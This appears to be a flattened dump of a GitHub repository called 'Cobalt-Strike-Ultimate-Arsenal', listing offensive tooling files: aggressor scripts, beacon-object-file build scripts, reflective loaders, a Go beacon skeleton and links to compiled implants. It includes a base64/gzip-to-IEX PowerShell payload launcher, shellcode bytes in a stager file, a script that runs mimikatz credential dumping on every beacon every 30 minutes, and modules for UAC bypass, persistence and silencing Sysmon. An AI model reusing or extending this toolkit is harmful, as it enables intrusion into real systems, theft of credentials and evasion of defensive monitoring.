Strike/Adrenaline/env_assessment/aad_ca_policy/aad_ca_policy.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/target_prioritization/user_idle/user_idle.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/metadata/struct.go: -------------------------------------------------------------------------------- 1 | package metadata 2 | 3 | type Metadata struct { 4 | userName string 5 | procName string 6 | hostName string 7 | ClientId uint32 8 | 9 | EncMetadata string 10 | } 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/File-Color-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/File-Color-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Sonata-Example-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Web-Hit-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Web-Hit-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/Exitservice/uinit.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/Exitservice/uinit.exe -------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/Kobra.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_common/beacon_common.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /ArtifactKit/beacon_service/beacon_service.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobalt Strike Toolset/AggressorScript/nopowershell/scripts/NoPowerShell.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobalt Strike Toolset/AggressorScript/nopowershell/scripts/NoPowerShell.exe -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-Client-Disconnect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-Client-Disconnect.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Discord-Linux-Parser.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Discord-Linux-Parser.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Host-File-Clone-Site.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Host-File-Clone-Site.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Keystrokes-Received.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Keystrokes-Received.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Beacon-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Beacon-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Screesnhot-taken.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-Screesnhot-taken.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/linux-parser-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/linux-parser-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/AdUserApi/HaryyUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/AdUserApi/HaryyUser.exe -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | gca/GoogleAuthenticationTool.class 2 | gca/GoogleCSAgent$DefineTransformer.class 3 | gca/GoogleCSAgent.class 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/cmd/main/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "belin/internal" 5 | "log" 6 | ) 7 | 8 | func main(){ 9 | err := internal.Init() 10 | if err != nil { 11 | log.Println(err.Error()) 12 | } 13 | } -------------------------------------------------------------------------------- /Cobatl Strike/Bypass UAC/Aggressor-Scripts-master/UACBypass/ExampleAudit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Bypass UAC/Aggressor-Scripts-master/UACBypass/ExampleAudit.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Process-Color-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Process-Color-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/windows-parser-example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/windows-parser-example.png -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/dazzleUP.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/classes/gca/GoogleAuthenticationTool.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleAuthenticationTool.class -------------------------------------------------------------------------------- /Cobatl Strike/SilenceSysmon/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc silencesysmon.c 4 | move /y silencesysmon.obj silencesysmon.o 5 | dumpbin /disasm silencesysmon.o > silencesysmon.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/rasta-mouse/loader.cna: -------------------------------------------------------------------------------- 1 | # Automatically loads all aggressor scripts. 2 | # Idea taken from Und3rf10w 3 | 4 | include(script_resource("elevate/elevate.cna")); 5 | include(script_resource("persistence/persistence.cna")); -------------------------------------------------------------------------------- /Loader/Titan Ldr/SectionLink.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text : 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/defense_detection/amsi_etw_detect/amsi_etw_detect.x86.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/applocker_policy/applocker_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/applocker_policy/applocker_policy.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/env_assessment/bitlocker_status/bitlocker_status.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/env_assessment/bitlocker_status/bitlocker_status.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-All-Tabs-Bold-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CS-All-Tabs-Bold-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-2.png -------------------------------------------------------------------------------- /Cobatl Strike/Spray AD/Src/Spray-AD/Spray-AD/Spray-AD.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Loader/Doge Loader/local/txt/xor/stager.txt: -------------------------------------------------------------------------------- 1 | \xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83\xfc\x48\x83 -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/window_handles_enum/window_handles_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Adrenaline/cred_access/window_handles_enum/window_handles_enum.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-Admin.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/CWD-Beacon-Bar-Example-Admin.png -------------------------------------------------------------------------------- /Cobatl Strike/DllEnvHijacking/bofcompile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /c /Od /MT /W0 /GS- /Tc dllenvhijacking.c 4 | move /y dllenvhijacking.obj dllenvhijacking.o 5 | dumpbin /disasm dllenvhijacking.o > dllenvhijacking.disasm 6 | 7 | -------------------------------------------------------------------------------- /Cobatl Strike/OperatorsKit/compile-all.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | for /r %%i in (*.bat) do ( 4 | if "%%i" neq "%~f0" ( 5 | echo Running %%i 6 | pushd "%%~dpi" 7 | call "%%i" 8 | popd 9 | ) 10 | ) -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Auto-Sleep-Interactive-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Auto-Sleep-Interactive-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Colors-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Beacon-Tab-Name-Colors-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-CS-Client-Connect-Example1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/New-CS-Client-Connect-Example1.png -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Teams-CNA-Linux-Parser-Example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Aggressor Kit/Pictures/Teams-CNA-Linux-Parser-Example.png -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent$DefineTransformer.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Google CSAgent/target/classes/gca/GoogleCSAgent$DefineTransformer.class -------------------------------------------------------------------------------- /Loader/HellLoader/HellsGate/HellsGate/HellsGate/HellsGate.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/Encryptor.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/FileControler/FileControler_x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike CNA/Persistence/Modules/FileControler/FileControler_x64.dll -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_spawn.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_spawn.x64.o -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_explicit.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Inject Kit/KIT/TartarusGate/bin/process_inject_explicit.x64.o -------------------------------------------------------------------------------- /Cobalt Strike Toolset/Kits/ResourceKit/compress.ps1: -------------------------------------------------------------------------------- 1 | $s=NEw-Object IO.MemoryStream(,[Convert]::FromBase64String("%%DATA%%"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); 2 | -------------------------------------------------------------------------------- /Cobalt Strike Win Exec/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0) 2 | 3 | project(rtty C) 4 | 5 | list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/Modules/") 6 | 7 | #set(CMAKE_VERBOSE_MAKEFILE ON) 8 | 9 | add_subdirectory(src) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/CSSG/assets/Encryptor/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Cobatl Strike/Enable WebDAV Client BOF/Makefile: -------------------------------------------------------------------------------- 1 | all: 2 | x86_64-w64-mingw32-gcc -c EnableWebDAVClient.c -masm=intel -Wall -DBOF -o EnableWebDAVClient.o 3 | x86_64-w64-mingw32-strip --strip-unneeded EnableWebDAVClient.o 4 | clean: 5 | rm EnableWebDAVClient.o -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/LinkOrder.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text ALIGN( 1 ) : SUBALIGN( 1 ) 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/pipe.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | SECTION( E ) HANDLE PipeInit( PAPI pApi, PCHAR Name ); 4 | SECTION( E ) BOOL PipeWait( PAPI pApi, HANDLE Pipe ); 5 | SECTION( E ) BOOL PipePrint( PAPI pApi, HANDLE Pipe, PCHAR Format, ... ); 6 | -------------------------------------------------------------------------------- /Profile/Malleable Profiles/sleepmask-vs/BOF-Template/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/encrypt/struct.go: -------------------------------------------------------------------------------- 1 | package encrypt 2 | 3 | import "crypto/rsa" 4 | 5 | type Enc struct { 6 | IV []byte 7 | GlobalKey []byte 8 | AesKey []byte 9 | HmacKey []byte 10 | 11 | RsaPubl *rsa.PublicKey 12 | RsaPriv *rsa.PrivateKey 13 | } -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/requester/struct.go: -------------------------------------------------------------------------------- 1 | package requester 2 | 3 | import "net/http" 4 | 5 | type ReqProfile struct { 6 | GETURL string 7 | PSTURL string 8 | Agent string 9 | 10 | Count int 11 | 12 | Client *http.Client 13 | Req *http.Request 14 | } -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x64.lib -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x86.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EvilWhales/Cobalt-Strike-Ultimate-Arsenal/HEAD/Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/minhook/minhook.x86.lib -------------------------------------------------------------------------------- /Cobatl Strike/IdleTime/idletime.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | DECLSPEC_IMPORT BOOL WINAPI USER32$GetLastInputInfo(PLASTINPUTINFO plii); 4 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(void); 5 | WINBASEAPI int __cdecl MSVCRT$printf(const char * _Format,...); -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Memory Evasion/SleepObfLoader/SleepObfLoader/SleepObfLoader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Process Inject Kit/process-inject-explicit/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Google CSAgent/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | /root/Music/mygithub/GoogleCSAgent_cdf/src/main/java/gca/GoogleCSAgent.java 2 | /root/Music/mygithub/GoogleCSAgent_cdf/src/main/java/gca/GoogleAuthenticationTool.java 3 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike Aggressor Kit/Auto/auto-sleep-interactive-for-testing.cna: -------------------------------------------------------------------------------- 1 | #Author: @nickvourd 2 | 3 | on beacon_initial { 4 | local('$bid'); 5 | $bid = $1; 6 | 7 | bsleep($1, 0); 8 | 9 | blog($1, "Setting sleep interval to 0"); 10 | } 11 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/link.ld: -------------------------------------------------------------------------------- 1 | SECTIONS 2 | { 3 | .text : 4 | { 5 | *( .text$A ) 6 | *( .text$B ) 7 | *( .text$C ) 8 | *( .text$D ) 9 | *( .text$E ) 10 | *( .rdata* ) 11 | *( .text$F ) 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Dazzle UP/dazzleUP/dazzleUP_Reflective_DLL/dazzleUP_Reflective_DLL/dazzleUP_Reflective_DLL.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Cobatl Strike/Venoma/Kobra/syscalls.asm: -------------------------------------------------------------------------------- 1 | .code 2 | 3 | extern syscallID : DWORD 4 | extern syscallAddr : QWORD 5 | 6 | public indirect_sys 7 | 8 | indirect_sys PROC 9 | mov r10, rcx 10 | mov eax, syscallID 11 | jmp QWORD PTR [syscallAddr] 12 | indirect_sys ENDP 13 | 14 | END -------------------------------------------------------------------------------- /Cobalt Strike Toolset/Kits/ResourceKit/htmlapp2.txt: -------------------------------------------------------------------------------- 1 | 11 | -------------------------------------------------------------------------------- /Cobatl Strike/BeLix/go.mod: -------------------------------------------------------------------------------- 1 | module belin 2 | 3 | go 1.23.2 4 | 5 | require ( 6 | github.com/jkeys089/jserial v1.0.1 7 | github.com/lujjjh/go-javaio v0.2.7 8 | ) 9 | 10 | require ( 11 | github.com/pkg/errors v0.8.1 // indirect 12 | golang.org/x/exp v0.0.0-20250106191152-7588d65b2ba8 13 | ) 14 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Notifier Discord/request.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | 4 | #Change webhook here 5 | webhookurl = "XXXXXXXXXXXXX" 6 | data = {"content": str(sys.argv[1])} 7 | response = requests.post(webhookurl, json=data) 8 | print(response.status_code) 9 | print(response.content) 10 | -------------------------------------------------------------------------------- /Cobatl Strike/Hidden Desktop/client/bof/start.asm: -------------------------------------------------------------------------------- 1 | [SEGMENT .text] 2 | 3 | %ifidn __OUTPUT_FORMAT__, win32 4 | GLOBAL _BofMain 5 | _BofMain: 6 | incbin "bin/HiddenDesktop.x86.bin" 7 | %else 8 | GLOBAL BofMain 9 | BofMain: 10 | incbin "bin/HiddenDesktop.x64.bin" 11 | %endif 12 | -------------------------------------------------------------------------------- /Loader/Titan Ldr/Labels.h: -------------------------------------------------------------------------------- 1 | /** 2 | * 3 | * Reflective Loader 4 | * 5 | * GuidePoint Security LLC 6 | * 7 | * Threat and Attack Simulation 8 | * 9 | **/ 10 | 11 | #pragma once 12 | 13 | static ULONG_PTR Start( VOID ); 14 | static ULONG_PTR GetIp( VOID ); 15 | static ULONG_PTR Hooks( VOID ); 16 | -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Killer/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Log Striker/requirements.txt: -------------------------------------------------------------------------------- 1 | # LogStriker Dependencies 2 | # No external Python packages required - uses only standard library 3 | # 4 | # External system requirements: 5 | # - OpenSSH client (ssh, scp commands) 6 | # - SSH config with teamserver entry 7 | # - SSH key-based authentication to teamserver 8 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/mimikatz-every-30m.cna: -------------------------------------------------------------------------------- 1 | # author: bluescreenofjeff 2 | #runs the mimikatz logonpasswords alias on all beacons 3 | 4 | on heartbeat_30m { 5 | foreach $beacon (beacons()) { 6 | $id = $beacon['id']; 7 | binput($id, "logonpasswords"); 8 | blogonpasswords($id); 9 | } 10 | } -------------------------------------------------------------------------------- /Cobatl Strike/Nim Beacon/cmd/dns.nim: -------------------------------------------------------------------------------- 1 | import std/[os, strutils, sequtils, times, streams, endians, tables] 2 | import ../[utils, config] 3 | import types, result 4 | 5 | proc dns_checkin(buf: var seq[byte], cmd: command_type) = 6 | # No need to handle this? 7 | discard 8 | 9 | register_command(CMD_TYPE_CHECKIN, dns_checkin) -------------------------------------------------------------------------------- /Loader/AceLdr/src/asm/start.asm: -------------------------------------------------------------------------------- 1 | [BITS 64] 2 | 3 | EXTERN Ace 4 | GLOBAL Start 5 | 6 | [SECTION .text$A] 7 | 8 | Start: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call Ace 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /Loader/HellLoader/HellsGate/HellsGate/HellsGate/connector.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef CONNECTOR_H 3 | #define CONNECTOR_H 4 | 5 | #ifdef __cplusplus 6 | extern "C" { 7 | #endif 8 | 9 | int Download(); 10 | 11 | 12 | #ifdef __cplusplus 13 | 14 | } 15 | #endif // __cplusplus 16 | 17 | #endif // CONNECTOR_H 18 | 19 | -------------------------------------------------------------------------------- /Cobatl Strike/Psk/psk_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PskBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psk", base_binary_name="Psk") 7 | 8 | self.parser.description = "Show detailed information from the windows kernel and loaded driver modules." 9 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . $beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . $beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psc/psc_bof.s1.py: -------------------------------------------------------------------------------- 1 | from outflank_stage1.task.base_bof_task import BaseBOFTask 2 | 3 | 4 | class PscBOF(BaseBOFTask): 5 | def __init__(self): 6 | super().__init__("psc", base_binary_name="Psc") 7 | 8 | self.parser.description = "Show detailed information from processes with established TCP and RDP connections." 9 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/beaconid_note.cna: -------------------------------------------------------------------------------- 1 | #author bluscreenofjeff 2 | 3 | #on load and initial Beacon set note to the Beacon id 4 | #(primarily useful when coding Aggressor scripts) 5 | 6 | on beacon_initial { 7 | bnote($1,$1); 8 | } 9 | 10 | foreach $beacon (beacons()){ 11 | bnote($beacon['id'],"bid: " . $beacon['id']); 12 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psw/psw_bof.s1.py: -------------------------------------------------------------------------------- 1 | from 